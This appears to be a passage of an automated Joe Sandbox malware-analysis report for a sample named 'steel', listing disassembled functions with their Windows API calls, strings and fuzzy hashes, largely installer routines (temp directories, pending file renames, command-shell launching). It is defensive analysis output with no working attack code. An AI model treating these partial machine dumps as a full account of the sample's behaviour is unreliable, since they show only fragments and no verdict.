                                                                                            • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                            • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                             control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                            • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID: 3A$yA
                                                                                            • API String ID: 3887896539-3278460822
                                                                                            • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                            • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                             control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                            APIs
                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                            • API String ID: 3376378930-166502273
                                                                                            • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                            • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F58F
                                                                                            • GetFocus.USER32 ref: 0042F597
                                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                            • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                            • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                            • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                            APIs
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                            • API String ID: 4130936913-2943970505
                                                                                            • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                            • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                              • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                              • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                              • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                              • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                            • API String ID: 854858120-615399546
                                                                                            • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                            • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                            APIs
                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                            • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                            • String ID: 2$MAINICON
                                                                                            • API String ID: 3935243913-3181700818
                                                                                            • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                            • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                            • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                            • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                              • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                              • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                              • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                              • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                              • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                              • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                              • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                              • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                              • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                              • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                            • API String ID: 316262546-2767913252
                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID:
                                                                                            • API String ID: 3887896539-0
                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                            Strings
                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                            • API String ID: 47109696-2199428270
                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                            • API String ID: 1375471231-2952887711
                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
